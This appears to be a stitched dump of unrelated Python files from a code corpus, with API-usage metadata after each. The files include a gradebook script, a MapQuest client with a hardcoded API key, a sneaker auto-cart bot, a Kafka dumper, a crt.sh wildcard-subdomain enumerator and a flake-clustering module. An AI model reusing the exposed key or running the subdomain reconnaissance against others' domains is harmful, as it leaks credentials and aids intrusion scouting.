data = [["학번", "출석", "퀴즈1", "퀴즈2", "중간고사", "기말고사", "프로젝트"],
        [1,10,8,5,14,26,12],
        [2,7,3,7,15,24,18],
        [3,9,5,8,8,12,4],
        [4,7,8,7,17,21,18],
        [5,7,8,7,16,25,15],
        [6,3,5,8,8,17,0],
        [7,4,9,10,16,27,18],
        [8,6,6,6,15,19,17],
        [9,10,10,9,19,30,19],
        [10,9,8,8,20,25,20]]

# Write the table into the worksheet (openpyxl cells are 1-indexed).
for x in range(1, len(data)+1) :
    for y in range(1, len(data[0])+1):
        ws.cell(row=x, column=y, value=data[x-1][y-1])

# 1. Overwrite every quiz-2 score (column D) with 10.
for idx, cell in enumerate(ws["D"]):
    if idx == 0: # skip the header row
        continue
    cell.value = 10

# 2. Add total and grade columns ("총점" = total, "성적" = grade).
ws["H1"] = "총점"
ws["I1"] = "성적"
for idx, score in enumerate(data, start=1):
    if idx == 1:
        continue
    # Total with quiz2 replaced by the new score of 10
    # (subtract the old quiz2 value at index 3, add 10).
    sum_val = sum(score[1:]) - score[3] + 10
    ws.cell(row=idx, column=8).value="=SUM(B{}:G{})".format(idx, idx)

    # Assign a letter grade from the total.
    grade = None
    if sum_val >= 90:
        grade = "A"
    elif sum_val >= 80:
        grade = "B"
    elif sum_val >= 70:
        grade = "C"
    else:
        grade = "D"

    # Attendance below 5 is an automatic F.
    if score[1] < 5:
        grade = "F"

    ws.cell(row=idx, column=9).value = grade

wb.save("scores.xlsx")
{
"api_name": "openpyxl.Workbook",
"line_number": 3,
"usage_type": "call"
}
] |
12177872909 | import requests
import urllib.parse
main_api = "https://www.mapquestapi.com/directions/v2/route?"
# NOTE(review): API keys should come from configuration/environment, not
# source control.
key = "p0Modq3JoAtVS6BXK5P5CinXWhJNUQwI"

# Repeatedly prompt for a route and query the MapQuest Directions API.
while True:
    orig = input("Starting Location: ")
    dest = input("Destination: ")
    url = main_api + urllib.parse.urlencode({
        "key" : key,
        "from" : orig,
        "to" : dest
    })

    json_data = requests.get(url).json()
    # Per the API response envelope, statuscode 0 means the call succeeded.
    json_status = json_data["info"]["statuscode"]

    print(f"URL: {url}")
    if json_status == 0:
        print(f"API Status: {json_status} = A successfull route call.\n")
{
"api_name": "urllib.parse.parse.urlencode",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "urllib.parse.parse",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "urllib.parse",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "req... |
11867021952 | # -----------------------------------------------------------------------------
# main.py
#
# Hung-Ruey Chen 109971346
# -----------------------------------------------------------------------------
import sys, os
import ply.lex as lex
import ply.yacc as yacc
from token_def import *
# Build the lexer
def main():
    """Build the lexer/parser, read the program file named in argv[1],
    tokenize it (debug logging), parse it to an AST and execute it.

    NOTE(review): both `log` and `logging` are used below; neither is
    imported in this file, so both presumably come from the star import of
    token_def — confirm, otherwise `log.debug` is a NameError.
    """
    log.debug(sys.argv[1])
    # Silence ply's table-generation warnings during lexer/parser build.
    sys.stderr = open(os.devnull, 'w')
    # lex.lex(debug=True)
    lex.lex()
    yacc.yacc()
    sys.stderr = sys.__stderr__
    r = open(sys.argv[1])
    code = ""
    # Normalize each line (strip surrounding whitespace, keep line breaks).
    for line in r:
        code += line.strip() + "\n"
    logging.debug(code)
    try:
        # First pass: log the token stream for debugging.
        lex.input(code)
        while True:
            token = lex.token()
            if not token: break
            logging.debug(token)
        # ast = yacc.parse(code, debug=True)
        ast = yacc.parse(code)
        ast.execute()
    except Exception as e:
        # Any lex/parse/runtime failure is logged and swallowed.
        logging.debug(e)
    r.close()
if __name__ == '__main__':
main() | vbigmouse/CSE307 | HW5/main.py | main.py | py | 949 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "sys.stderr",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.devnull",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "ply.lex.lex",
"line... |
75263396265 | import requests
from urllib.parse import urlparse
import concurrent.futures
# Extract domain from a URL
def extract_domain(url):
return urlparse(url).netloc
# Fetch subdomains from crt.sh
def get_subdomains_from_crtsh(domain):
try:
response = requests.get(f"https://crt.sh/?q=%.{domain}&output=json")
if response.status_code == 200:
json_data = response.json()
# Extract name_value (subdomain) from each certificate and filter wildcard entries
return [item['name_value'] for item in json_data if '*' in item['name_value']]
return []
except requests.RequestException:
return []
def main():
# Load domains from the input file
with open('h1_web_fix1.txt', 'r') as file:
urls = file.readlines()
domains = [extract_domain(url.strip()) for url in urls]
wildcard_subdomains = []
# Using ThreadPoolExecutor to speed up fetching subdomains
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
future_to_domain = {executor.submit(get_subdomains_from_crtsh, domain): domain for domain in domains}
for future in concurrent.futures.as_completed(future_to_domain):
wildcard_entries = future.result()
wildcard_subdomains.extend(wildcard_entries)
# Save wildcard subdomains to an output file
with open('wildcard_subdomains.txt', 'w') as out_file:
for subdomain in wildcard_subdomains:
out_file.write(f"{subdomain}\n")
print(f"Found {len(wildcard_subdomains)} wildcard subdomains. Saved to wildcard_subdomains.txt.")
if __name__ == "__main__":
main()
| RepoRascal/test | run.py | run.py | py | 1,650 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.parse.urlparse",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.RequestException",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "conc... |
22644746365 | import requests
import time
from bs4 import BeautifulSoup as bs
import re
import webbrowser
# --- Configuration -------------------------------------------------------
sizes = [7, 9.5, 11]  # shoe sizes to try to add to cart (compared against option text)
new_arrivals_page_url = 'https://www.theclosetinc.com/collections/new-arrivals'
base_url = 'https://www.theclosetinc.com'
post_url = 'https://www.theclosetinc.com/cart/add.js'  # NOTE(review): unused in this file
keywords = ['yeezy', 'inertia']  # product-URL fragments that trigger a purchase attempt
def get_product_page_url():
    """Poll the new-arrivals page (up to 15 attempts, 1s apart) for a product
    link matching ``keywords``; on success, hand the product URL to
    add_to_cart(). Relies on the module-level ``session`` being initialised.
    """
    href_link = None
    for retries in range(15):
        response = session.get(new_arrivals_page_url).text
        soup = bs(response, 'lxml')
        print('Trying to find keywords, attempt {}...'.format(retries+1))
        href_link = soup.find(
            "a", {'itemprop': 'url', 'href': re.compile("|".join(keywords))})
        if href_link is None:
            time.sleep(1)
        else:
            break
    # Bug fix: previously, exhausting all retries left href_link as None and
    # crashed with AttributeError on href_link.get('href'); bail out instead.
    if href_link is None:
        print('No product matching keywords found after 15 attempts; giving up.')
        return
    product_page_url = base_url + href_link.get('href')
    print("Acquired product page url: {}".format(product_page_url))
    add_to_cart(product_page_url)
def add_to_cart(product_page_url):
    """For each configured size, locate its <option> on the product page and
    open the browser on a direct add-to-cart URL (``/cart/<variant_id>:1``).

    Relies on module-level ``session``, ``sizes`` and ``base_url``.
    """
    response = session.get(product_page_url).text
    soup = bs(response, 'lxml')
    for size in sizes:
        # Match the variant by its SKU suffix, e.g. "...-9.5"
        option = soup.find('option', {'data-sku': re.compile('-' + str(size))})
        if option:
            # assumes option.text is the numeric size label -- TODO confirm;
            # a non-numeric label would raise ValueError here.
            if float(option.text) == size:
                id = option.get('value')  # Shopify variant id
                webbrowser.open_new(base_url + '/cart/{}:1'.format(id))
        else:
            print("Size {} sold out...".format(size))
if __name__ == "__main__":
    total_time = time.time()
    # Shared session (used by both helper functions) with a desktop UA so the
    # shop does not serve a bot-detection page.
    session = requests.Session()
    session.headers.update(
        {'User-Agent': '"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"'}
    )
    get_product_page_url()
    print("Total time: ", time.time() - total_time)
| athithianr/deadstock-bot | bots/theclosetinc_bot.py | theclosetinc_bot.py | py | 1,681 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "bs4.BeautifulSoup",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line... |
6411274184 | import json
from bitbnspy import bitbns
# from bitbnspy import bitbns
import config
# API credentials live in config.py (kept out of version control).
key = config.apiKey
secretKey = config.secret
bitbnsObj = bitbns(key, secretKey)  # authenticated client
# print('APIstatus: =', bitbnsObj.getApiUsageStatus)
# getPairTicker = bitbnsObj.getTickerApi('DOGE')
# print(' PairTicker : ', getPairTicker)
print('====================================')
# dumpBid = json.dumps(getPairTicker)
# loadBid = json.loads(dumpBid)
# getBid = loadBid['highest_buy_bid']
# print('highest buy: ', loadBid)
print('====================================')
# OpenOrders = bitbnsObj.listOpenOrders('DOGE')
# print(OpenOrders)
# NOTE(review): this rebinding discards the authenticated client created
# above -- presumably leftover experimentation; confirm before relying on it.
bitbnsObj = bitbns.publicEndpoints()
getTickers = bitbnsObj.fetchTickers()
# NOTE(review): the dumps/loads round-trip only normalises getTickers to
# plain JSON types; it has no other effect.
dumpTickers = json.dumps(getTickers)
loadTickers = json.loads(dumpTickers)
print(loadTickers)
| npenkar/botCode | BitbnsPy/botbns.py | botbns.py | py | 788 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "config.apiKey",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "config.secret",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "bitbnspy.bitbns",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "bitbnspy.bitbns.p... |
72753340263 | import json
import time
import os
import uuid
import argparse
from datetime import datetime, timedelta
from kafka import KafkaConsumer, SimpleConsumer
import os.path
import subprocess
def gzip_yesterday(yesterday):
    """Compress yesterday's dump file (``<target_folder>/<target_file>_<yesterday>.json``)
    with the external ``gzip`` command.

    Returns gzip's stdout (b'' on success), or None when the file does not
    exist. Relies on the module-level ``args`` namespace.
    """
    out = None
    fname = args.target_folder+"/"+args.target_file+"_"+yesterday+".json"
    if os.path.isfile(fname):
        # Bug fix: the old ("gzip__"+fname).split("__") trick produced a
        # broken argv for any path that itself contained "__".
        cmd = ["gzip", fname]
        out = subprocess.check_output(cmd)
    return out
def save():
    """Consume messages from the configured Kafka topic forever, appending
    each message (as one JSON line) to a per-day file, and optionally
    gzipping yesterday's file after every message."""
    #print "save"
    # Kafka
    consumer = KafkaConsumer(bootstrap_servers=args.kafka_bootstrap_srvs, group_id=args.kafka_group_id)
    consumer.subscribe([args.kafka_source_topic])
    for msg in consumer:
        #
        #print msg.value
        indata = json.loads(msg.value)
        #print indata
        #
        # today as 'YYYY-MM-DD', yesterday as 'YYYYMMDD' (matches file naming)
        today = str(datetime.today())[0:10]
        yesterday = datetime.strftime(datetime.now() - timedelta(1), '%Y%m%d')
        #
        #print today
        #
        file_name = args.target_folder+"/"+args.target_file+"_"+today.replace("-","")+".json"
        # Append one JSON document per line (JSON-lines format)
        with open(file_name, 'a') as the_file:
            the_file.write(json.dumps(indata)+'\n')
        #
        # NOTE(review): this re-runs for every message; gzip_yesterday is a
        # no-op once yesterday's file has been compressed (renamed to .gz).
        if args.gzip_yesterday == "yes":
            gzip_yesterday(yesterday)
if __name__ == '__main__':
    # Command-line configuration; the resulting ``args`` namespace is read
    # as a module-level global by save() and gzip_yesterday().
    parser = argparse.ArgumentParser(description="Dump topic")
    parser.add_argument('--kafka_bootstrap_srvs', default="localhost:9092")
    parser.add_argument('--kafka_group_id', default="backup_topic")
    parser.add_argument('--kafka_source_topic', default="good")
    parser.add_argument('--target_folder', default="data")
    parser.add_argument('--target_file', default="good")
    parser.add_argument('--gzip_yesterday', default="yes")
    #
    args = parser.parse_args()
    #
    save()
| goliasz/kafka2bigquery | src/main/python/dump_topic.py | dump_topic.py | py | 1,687 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.isfile",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "subprocess.check_output",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "kafka.KafkaConsum... |
31965515598 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# vi: ts=4 sw=4
import pickle
from ..Protocols import *
from scipy.spatial.distance import cdist
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans, MeanShift, estimate_bandwidth, AffinityPropagation, SpectralClustering # Clustering methods
from sklearn.decomposition import PCA
import skimage
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.patches as patches
class cluster(ProtocolMultiple):
def __init__(self, name='cluster', **kwargs):
    """Configure the clustering protocol.

    Args:
        name: protocol name (class name is used when None).
        **kwargs: overrides for the default ``run_args`` below.
    """
    self.name = self.__class__.__name__ if name is None else name
    self.default_ext = '.pkl'
    self.run_args = {
        'file_extension' : '.pkl',
        'force' : False,
        'verbosity' : 3,
        'num_jobs' : None,
        'num_clusters' : 20,
        'cluster_method' : 'kmeans', # 'affinity', 'kmeans', 'meanshift'
        'features' : 'all', # 'shape', 'color', 'all'
        'feature_normed_range' : [-2, +2], # range for plotting the normed features
        'bbox_pad' : 0.5,
        'image_contrast' : (0, 1),
        'image_contrast_trim' : None,
        'overlays' : 3,
    }
    self.run_args.update(kwargs)
    # WARNING: This association of features names is hard-coded, and is thus contingent
    # on the current implementation of Protocols.py>flake_analysis
    self.feature_names_color = [
        'g contrast',
        'v contrast',
        'gray',
        'gray std',
        'H',
        'S',
        'V',
        'H std',
        'S std',
        'V std',
        'R',
        'G',
        'B',
        'R std',
        'G std',
        'B std',
        'entropy'
    ]
    # Each color feature also exists for the flake interior ("inner") region.
    self.feature_names_color = self.feature_names_color + ['{}_inner'.format(f) for f in self.feature_names_color]
    self.feature_names_shape = ['P/A'] + ['hist {}'.format(i) for i in range(15)] + ['fractal dimension']
def load_flakes(self, datas, **run_args):
    """Aggregate the 'flakes' lists from every input pickle file in *datas*
    into one flat list and return it."""
    flakes = []
    for data in datas:
        with open(data.infile, 'rb') as fin:
            saved = pickle.load(fin) # 'res_map', 'image_labelmap', 'flakes'
        if len(flakes)==0:
            # Image dimensions from the first file (h, w currently unused here)
            h, w = saved['res_map'].shape
        for flake in saved['flakes']:
            flakes.append(flake)
            #self.print_structure(flake)
        if run_args['verbosity']>=5:
            print(' {} flakes added from image {}'.format(len(saved['flakes']), data.infile))
    return flakes
def load_flakes_parallel(self, datas, **run_args):
    """Like load_flakes(), but loads the pickle files in parallel with joblib.

    Requires joblib (imported locally so serial use has no extra dependency).
    """
    # Parallelize loading
    # Doesn't seem to actually run faster (likely I/O limited)
    from joblib import Parallel, delayed
    import itertools
    flakes = Parallel(n_jobs=run_args['num_jobs'])(delayed(self.load_flake_pkl)(data.infile) for data in datas)
    # Flatten the per-file lists into one list of flakes
    flakes = list(itertools.chain.from_iterable(flakes))
    return flakes
def load_flake_pkl(self, infile):
    """Load a single analysis pickle and return its 'flakes' list."""
    with open(infile, 'rb') as handle:
        payload = pickle.load(handle)
    return payload['flakes']
def load_features(self, flakes, **run_args):
    """Build the per-flake feature matrix selected by run_args['features']
    ('all', 'color', 'shape', or a custom key), setting self.feature_names
    to match, and return it as a numpy array (one row per flake).

    Feature names stored inside the flakes themselves take precedence over
    the hard-coded defaults from __init__.
    """
    if run_args['features']=='all':
        # Concatenate color and shape features into a single vector per flake
        features = [ np.concatenate([flake['flake_color_fea'], flake['flake_shape_fea']]) for flake in flakes ]
        if 'flake_color_fea_names' in flakes[0]:
            self.feature_names_color = flakes[0]['flake_color_fea_names']
        if 'flake_shape_fea_names' in flakes[0]:
            self.feature_names_shape = flakes[0]['flake_shape_fea_names']
        self.feature_names = self.feature_names_color + self.feature_names_shape
    else:
        features = [ flake['flake_{}_fea'.format(run_args['features'])] for flake in flakes ]
        if run_args['features']=='color':
            if 'flake_color_fea_names' in flakes[0]:
                self.feature_names = flakes[0]['flake_color_fea_names']
            else:
                self.feature_names = self.feature_names_color
        elif run_args['features']=='shape':
            if 'flake_shape_fea_names' in flakes[0]:
                self.feature_names = flakes[0]['flake_shape_fea_names']
            else:
                self.feature_names = self.feature_names_shape
        else:
            # Custom feature set: use stored names when available, else none
            if 'flake_{}_fea_names'.format(run_args['features']) in flakes[0]:
                self.feature_names = flakes[0]['flake_{}_fea_names'.format(run_args['features'])]
            else:
                self.feature_names = []
    return np.asarray(features)
def load_clustering(self, basename, output_dir='./', features_rescaled=None, **run_args):
    """Load the cluster.pkl produced by cluster.run, looking first in
    *output_dir* and then in the sibling '../cluster/' directory.

    If neither file exists but *features_rescaled* is given, recompute the
    minimal 'distributions'/'dist_bin_edges' entries from it. Returns the
    clustering dict, or None when no information is available (previously
    this last case crashed with NameError at the return statement).
    """
    # Load data aggregated from the "cluster" protocol into a cluster.pkl file
    savefile = self.get_outfile(basename, output_dir, ext=run_args['file_extension'])
    if os.path.exists(savefile):
        with open(savefile, 'rb') as fin:
            clustering = pickle.load(fin)
    else:
        savefile = self.get_outfile(basename, output_dir+'/../cluster/', ext=run_args['file_extension'])
        if os.path.exists(savefile):
            with open(savefile, 'rb') as fin:
                clustering = pickle.load(fin)
        elif features_rescaled is not None:
            # Manually recompute some minimal aspects of clustering
            # Note: This mostly exists so that select_flakes.run has access to this information
            # even if cluster.run has never been run (and thus cluster.pkl doesn't exist).
            clustering = {}
            vmin, vmax = run_args['feature_normed_range']
            distributions, dist_bin_edges = np.apply_along_axis(lambda x: np.histogram(x, bins=50, range=[vmin,vmax], density=True), 0, features_rescaled)
            clustering['distributions'] = distributions
            clustering['dist_bin_edges'] = dist_bin_edges
        else:
            print("Error in cluster.load_clustering: we don't have access to clustering information.")
            # Bug fix: 'clustering' was unbound here, so the return below
            # raised NameError; return None explicitly instead.
            clustering = None
    return clustering
@run_default
def run(self, datas, output_dir, basename, **run_args):
    """Aggregate flakes from all input pickles, cluster them in (normed)
    feature space, save the clustering to <basename>.pkl, and generate
    diagnostic images (PCA projection, distance map, per-cluster sheets).

    Returns a results dict (runtime, method, number of clusters, files saved).
    """
    results = {}
    clustering = {} # Save results of clustering operation
    # Aggregate results
    ########################################
    flakes = self.load_flakes(datas, **run_args)
    if run_args['verbosity']>=4:
        print(' {:,d} flakes identified in {:d} images'.format(len(flakes), len(datas)))
    features_orig = self.load_features(flakes, **run_args)
    # Clustering
    ########################################
    # Normalize each feature dimension to zero mean / unit variance so no
    # single feature dominates the distance metric.
    rescale = StandardScaler()
    features = rescale.fit_transform(features_orig)
    if run_args['verbosity']>=4:
        print(" Clustering {:,d} flakes using '{}'".format(len(flakes), run_args['cluster_method']))
    start = time.time()
    n_jobs = run_args['num_jobs'] if 'num_jobs' in run_args else -1
    if run_args['cluster_method']=='kmeans':
        cluster_result = KMeans(n_clusters=run_args['num_clusters'], random_state=0, n_jobs=n_jobs).fit(features)
    elif run_args['cluster_method']=='meanshift':
        bandwidth = estimate_bandwidth(features, quantile=0.1)#, n_samples=int(features.shape[0]/10))
        cluster_result = MeanShift(bandwidth=bandwidth, bin_seeding=True, n_jobs=n_jobs).fit(features)
    elif run_args['cluster_method']=='affinity':
        cluster_result = AffinityPropagation().fit(features)
    elif run_args['cluster_method']=='spectral':
        # NOTE(review): sklearn's SpectralClustering exposes no
        # cluster_centers_ attribute, so the sorting code below will raise
        # AttributeError for this method -- confirm before using 'spectral'.
        cluster_result = SpectralClustering(n_clusters=run_args['num_clusters'], n_jobs=n_jobs).fit(features)
    else:
        print("ERROR: clustering method '{}' not recognized.".format(run_args['cluster_method']))
        raise NotImplementedError
    clustering['cluster_result'] = cluster_result
    results['cluster_runtime'] = time.time()-start
    results['cluster_method'] = run_args['cluster_method']
    # Assignments are unsorted by default
    assignment = cluster_result.labels_
    results['num_clusters'] = len(np.unique(assignment))
    clustering['assignment'] = assignment # Label ids for each flake, saying what cluster it belongs to [unsorted indexing]
    if run_args['verbosity']>=4:
        print(" clustering took {:.1f}s ({:d} clusters)".format(results['cluster_runtime'], results['num_clusters']))
    # Sort clusters into a sensible order
    consider_features = np.asarray([flake['flake_color_fea'][:2] for flake in flakes]) # Grayscale and V contrast
    # The average for each cluster gives the position for the center of that cluster (in the feature space)
    central_features = np.zeros([results['num_clusters'], consider_features.shape[1]])
    for i in range(results['num_clusters']):
        cluster_i = np.nonzero(assignment==i)[0]
        central_features[i,:] = np.mean(consider_features[cluster_i, :])
    # Order clusters by increasing |contrast| magnitude
    clustering['sort_indices'] = np.argsort(np.abs(central_features).sum(1))
    clustering['unsort2sort'] = np.unique(clustering['sort_indices'], return_index=True)[1]
    clustering['cluster_centers'] = cluster_result.cluster_centers_[clustering['sort_indices']] # in (normed) feature space coordinates [sorted indexing]
    clustering['cluster_centers_orig'] = rescale.inverse_transform(clustering['cluster_centers']) # in (original) feature space coordinates [sorted indexing]
    clustering['cluster_center_distances'] = cdist(clustering['cluster_centers'], clustering['cluster_centers']) # in (normed) feature space coordinates [sorted indexing]
    # Compute additional things
    ########################################
    # The distribution (histogram) for each feature dimension
    # Since these are normed they should look somewhat Gaussian
    vmin, vmax = run_args['feature_normed_range']
    distributions, dist_bin_edges = np.apply_along_axis(lambda x: np.histogram(x, bins=50, range=[vmin,vmax], density=True), 0, features)
    clustering['distributions'] = distributions
    clustering['dist_bin_edges'] = dist_bin_edges
    # Output results
    ########################################
    # Save cluster results
    outfile = self.get_outfile(basename, output_dir, ext=run_args['file_extension'])
    results['files_saved'] = [
        { 'filename': '{}'.format(outfile) ,
        'description' : 'results of cluster analysis' ,
        'type' : 'data'
        } ,
        ]
    with open(outfile, 'wb') as fout:
        pickle.dump(clustering, fout)
    # Output images
    if run_args['verbosity']>=4:
        print(' Generating PCA 3D projection')
    # Pick a color for each cluster
    norm = mpl.colors.Normalize(vmin=0, vmax=results['num_clusters']-1)
    cmap = mpl.cm.jet
    #cmap = cmap_vge
    m = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)
    cluster_colors = [m.to_rgba(index) for index in range(results['num_clusters'])]
    # Project into 3 dimensions for visualization only
    pca = PCA(n_components=3)
    coordinates = pca.fit_transform(features)
    outfile = self.get_outfile(basename, output_dir, ext='-{}.png'.format(run_args['cluster_method']))
    self.plot_pca(outfile, coordinates, assignment, cluster_colors, **run_args)
    if run_args['verbosity']>=4:
        print(' Generating map of distances')
    outfile = self.get_outfile('distances', output_dir, ext='-{}.png'.format(run_args['cluster_method']))
    self.plot_distances(outfile, clustering['cluster_center_distances'], cluster_colors, **run_args)
    if run_args['verbosity']>=4:
        print(' Generating cluster images')
    self.plot_clusters(output_dir, clustering['cluster_centers'], clustering['cluster_centers_orig'], clustering['sort_indices'], distributions, dist_bin_edges, flakes, features, assignment, rescale=rescale, **run_args)
    return results
def plot_pca(self, outfile, coordinates, assignment, cluster_colors, **run_args):
    """Save a 4-panel figure of the flakes in 3D PCA space: one 3D scatter
    plus the three 2D projections, with cluster centroids labeled."""
    flake_colors = [cluster_colors[index] for index in assignment]
    # Centroid of each cluster (in PCA coordinates)
    num_clusters = np.max(assignment)+1
    cluster_coordinates = np.zeros([num_clusters, coordinates.shape[1]])
    for i in range(num_clusters):
        cluster_i = np.nonzero(assignment==i)[0]
        cluster_coordinates[i,:] = np.mean(coordinates[cluster_i,:], axis=0)
    cluster_index = range(cluster_coordinates.shape[0])
    plt.rcParams['xtick.labelsize'] = 8
    plt.rcParams['ytick.labelsize'] = 8
    plt.rcParams['axes.labelsize'] = 12
    plt.rcParams['lines.markersize'] = 5
    cmap = run_args['cmap'] if 'cmap' in run_args else 'jet'
    alpha = 0.12
    self.fig = plt.figure(figsize=(10,10))
    self.fig.subplots_adjust(left=0.08, right=0.95, bottom=0.08, top=0.95, hspace=0.15, wspace=0.15)
    # Top-right panel: 3D scatter
    self.ax = self.fig.add_subplot(2,2,2 , projection='3d')
    self.ax.scatter(coordinates[:,0], coordinates[:,1], coordinates[:,2], c=flake_colors, alpha=0.3)
    self.ax.set_xlabel('$\mathrm{PCA}_1$', labelpad=-4)
    self.ax.set_ylabel('$\mathrm{PCA}_2$', labelpad=-4)
    self.ax.set_zlabel('$\mathrm{PCA}_3$', labelpad=-2)
    self.ax.tick_params(axis='both', which='major', pad=-1)
    self.ax.view_init(elev=30, azim=45-90)
    # Top-left panel: PCA1 vs PCA3
    self.ax = self.fig.add_subplot(2,2,1)
    self.ax.scatter(coordinates[:,0], coordinates[:,2], c=flake_colors, edgecolors=None, alpha=alpha)
    self.ax.set_xlabel('$\mathrm{PCA}_1$')
    self.ax.set_ylabel('$\mathrm{PCA}_3$')
    self.overlay_cluster_number(cluster_coordinates, cluster_index, 0, 2, cluster_colors)
    xi, xf, yi, yf = self.ax.axis()
    self.ax.text(xi,yf, '{:,d} flakes in {} clusters'.format(len(assignment), len(cluster_colors)), size=10, verticalalignment='top', horizontalalignment='left', alpha=0.5)
    # Bottom-left panel: PCA1 vs PCA2
    self.ax = self.fig.add_subplot(2,2,3)
    self.ax.scatter(coordinates[:,0], coordinates[:,1], c=flake_colors, cmap=cmap, edgecolors=None, alpha=alpha)
    self.ax.set_xlabel('$\mathrm{PCA}_1$')
    self.ax.set_ylabel('$\mathrm{PCA}_2$')
    self.overlay_cluster_number(cluster_coordinates, cluster_index, 0, 1, cluster_colors)
    # Bottom-right panel: PCA3 vs PCA2
    self.ax = self.fig.add_subplot(2,2,4)
    self.ax.scatter(coordinates[:,2], coordinates[:,1], c=flake_colors, cmap=cmap, edgecolors=None, alpha=alpha)
    self.ax.set_xlabel('$\mathrm{PCA}_3$')
    self.ax.set_ylabel('$\mathrm{PCA}_2$')
    self.overlay_cluster_number(cluster_coordinates, cluster_index, 2, 1, cluster_colors)
    plt.savefig(outfile, dpi=300)
    plt.close()
def overlay_cluster_number(self, cluster_coordinates, cluster_index, coord1, coord2, cluster_colors):
    """Draw faded markers at each cluster centroid on the current self.ax,
    labeled with the cluster's index (coord1/coord2 select the axes)."""
    r = 0.3 # r=1 means no fade (strong color), r=0 means fully faded (appears white)
    # Blend each RGB channel toward white while keeping the alpha channel
    cluster_colors_a = [ [ 1-(1-c[0])*r, 1-(1-c[1])*r, 1-(1-c[2])*r, c[3]] for c in cluster_colors]
    self.ax.scatter(cluster_coordinates[:,coord1], cluster_coordinates[:,coord2], s=25, c=cluster_colors_a, edgecolor=cluster_colors, alpha=1)
    for i in range(cluster_coordinates.shape[0]):
        self.ax.text(cluster_coordinates[i, coord1], cluster_coordinates[i, coord2], '{}'.format(i), size=3, horizontalalignment='center', verticalalignment='center')
def plot_distances(self, outfile, cluster_center_distances, cluster_colors, plot_buffers=[0.15,0.05,0.15,0.05], **run_args):
    """Save a heatmap of pairwise cluster-center distances, with colored
    (and, for small cluster counts, numbered) index strips on the top and
    right edges."""
    plt.rcParams['xtick.labelsize'] = 15
    plt.rcParams['ytick.labelsize'] = 15
    plt.rcParams['axes.labelsize'] = 20
    plt.rcParams['lines.markersize'] = 5
    self.fig = plt.figure( figsize=(8,8), facecolor='white' )
    left_buf, right_buf, bottom_buf, top_buf = plot_buffers
    fig_width = 1.0-right_buf-left_buf
    fig_height = 1.0-top_buf-bottom_buf
    self.ax = self.fig.add_axes( [left_buf, bottom_buf, fig_width, fig_height] )
    #plt.figtext(0,1, 'distances between clusters (in the feature space)', size=15, verticalalignment='top', horizontalalignment='left')
    self.ax.imshow(cluster_center_distances, cmap='viridis')
    self.ax.set_xlabel('cluster index')
    self.ax.set_ylabel('cluster index')
    xi, xf, yi, yf = self.ax.axis()
    s = 0.02  # thickness of the color strips
    n = len(cluster_colors)
    # Top strip of cluster colors
    self.axt = self.fig.add_axes( [left_buf, bottom_buf+fig_height, fig_width, s] )
    self.axt.scatter(range(n), np.ones(n), c=cluster_colors)
    if n<160:  # only label indices when they still fit
        for i in range(n):
            self.axt.text(i, 1, '{}'.format(i), size=4, horizontalalignment='center', verticalalignment='center')
    self.axt.axis([xi, xf, 0, 2])
    self.axt.axes.get_xaxis().set_visible(False)
    self.axt.axes.get_yaxis().set_visible(False)
    # Right strip of cluster colors
    self.axr = self.fig.add_axes( [left_buf+fig_width, bottom_buf, s, fig_height] )
    self.axr.scatter(np.ones(n), range(n), c=cluster_colors)
    if n<80:
        for i in range(n):
            self.axr.text(1, i, '{}'.format(i), size=4, horizontalalignment='center', verticalalignment='center')
    self.axr.axis([0, 2, yi, yf])
    self.axr.axes.get_xaxis().set_visible(False)
    self.axr.axes.get_yaxis().set_visible(False)
    plt.savefig(outfile, dpi=300)
def plot_clusters(self, output_dir, cluster_centers, cluster_centers_orig, sort_indices, distributions, dist_bin_edges, flakes, flake_features, assignment, rescale=None, plot_buffers=[0.01,0.0,0.0,0.045], **run_args):
    """Generate one representative-flakes image per cluster (sorted order),
    delegating to plot_cluster() for each.

    NOTE: plot_buffers uses a mutable default list; it is never mutated here,
    so this is benign.
    """
    plt.rcParams['xtick.labelsize'] = 15
    plt.rcParams['ytick.labelsize'] = 15
    plt.rcParams['axes.labelsize'] = 20
    plt.rcParams['lines.markersize'] = 5
    #for i, feature_vector in enumerate(cluster_centers[:1]): # for testing
    for i, feature_vector in enumerate(cluster_centers):
        # i # [sorted indexing]
        # feature_vector # in (normed) feature space coordinates [sorted indexing]
        feature_vector_orig = cluster_centers_orig[i] # in (original) feature space coordinates [sorted indexing]
        i_before_sort = sort_indices[i] # [unsorted indexing]
        cluster_i = np.nonzero(assignment==i_before_sort)[0] # indices [in unsorted indexing] of all flakes matching this cluster
        flakes_cluster = np.asarray(flakes)[cluster_i] # flakes matching this cluster
        features_cluster = flake_features[cluster_i] # feature vectors matching this cluster
